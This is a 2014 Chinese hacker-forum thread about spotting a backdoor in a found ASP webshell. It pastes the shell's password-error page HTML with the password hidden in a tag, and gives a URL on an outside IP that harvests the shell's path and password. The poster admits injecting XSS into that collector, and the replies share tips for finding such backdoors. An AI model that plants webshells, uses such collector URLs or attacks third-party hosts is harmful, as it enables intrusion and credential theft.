查看: 13985|回复: 6

辨别大马后门

[复制链接]

该用户从未签到

发表于 2014-5-11 19:03:46 | 显示全部楼层 |阅读模式
今天发现个大马躺在那里
7Z.png
这种马都是由后门的、

[HTML] 纯文本查看 复制代码
<html><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>噬魂M辉 - 192.168.100.2 </title>
<style type="text/css">body,tr,td{margin-top:5px;background-color:#000000;color:#33FF00;font-size:12px;SCROLLBAR-FACE-COLOR:#000000;scrollbar-arrow-color:#33FF00;scrollbar-highlight-color:#006300;scrollbar-3dlight-color:#33FF00;scrollbar-shadow-color:#33FF00}.sb{cursor:hand}input,select,textarea{border-top-width:1px;font-weight: bold;border-left-width: 1px;font-size:11px;border-left-color: #33FF00;background: #000000;border-bottom-width: 1px;border-bottom-color: #33FF00;color: #33FF00;border-top-color: #33FF00;font-family: verdana;border-right-width: 1px;border-right-color: #33FF00;}#d{background: #003000;padding-left:5px;padding-right:5px}pre{font-size: 11px;font-family: verdana;color: #33FF00;}hr{color: #33FF00;background-color: #33FF00;height: 5px;}#x{font-family: verdana;font-size:13px}a{color:#33FF00;text-decoration:none;}.am{color:#aaa;font-size:11px;}</style>
<script>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("确认要执行此操作吗?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="→Hack by 噬魂M辉  --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("请输入复制到目标文件全名称",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("请输入移动到目标文件全名称",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("请输入移动到目标文件夹全名称",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("请输入移动到目标文件夹全名称",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("请输入要新建的文件夹全名称",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}</script>
<body scroll=no></form>
<script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>
<br>
<br>
<br>
<b>
<div align=center><font size='5' color='red'>PassWord Error!</font 941014></b> 
<br>
<br>
<br>
<br>
<b><div align=center><font size='14' color='lime'></font></b></p></center>
<br><br><center><a href='javascript:history.back()'>返回</a></center>


密码就在</font 941014>
进去以后用firebug一看
http://202.77.181.164/?u=www.lnl ... /c.asp&p=941014
一个箱子在那了
我xss插进去了,不过好像没反映的样子

评分

参与人数 1i币 -6 收起 理由
zhoujian017 -6 这是我的马

查看全部评分

回复

使用道具 举报

  • TA的每日心情
    开心
    2016-12-11 20:10
  • 签到天数: 24 天

    [LV.4]偶尔看看III

    发表于 2014-5-11 19:16:48 | 显示全部楼层
    现在这工具都特么不太安全啊
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-11 22:49:58 | 显示全部楼层
    搜下http ptth 一般也就万能密码 显示密码 发送密码
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-11-8 14:32
  • 签到天数: 140 天

    [LV.7]常住居民III

    发表于 2014-5-11 23:06:18 | 显示全部楼层
    是的,太不安全了!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2014-5-12 11:27:00 | 显示全部楼层
    想不劳而获的人太多了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-8-22 21:23
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2014-5-12 20:54:04 | 显示全部楼层
    社会太不安全了,混不下去。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-4-24 14:55
  • 签到天数: 54 天

    [LV.5]常住居民I

    发表于 2014-5-15 00:28:36 | 显示全部楼层
    还有其他的后门吧
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 15:23 , Processed in 0.038516 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部